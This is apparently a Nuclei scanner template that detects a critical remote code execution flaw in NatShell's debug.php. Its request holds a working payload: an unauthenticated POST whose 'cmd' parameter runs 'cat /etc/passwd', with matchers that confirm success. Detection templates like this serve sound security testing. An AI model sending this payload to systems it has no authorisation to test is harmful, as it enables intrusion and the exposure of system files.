id: natshell-rce

info:
  name: NatShell Debug File - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    The NatShell debug file is susceptible to a remote code execution vulnerability.
  reference:
    - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: natshell,rce

requests:
  - method: POST
    path:
      - "{{BaseURL}}/debug.php"
    body: |
      cmd=cat /etc/passwd

    matchers-condition: and
    matchers:

      - type: regex
        part: body
        regex:
          - "toor:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/30
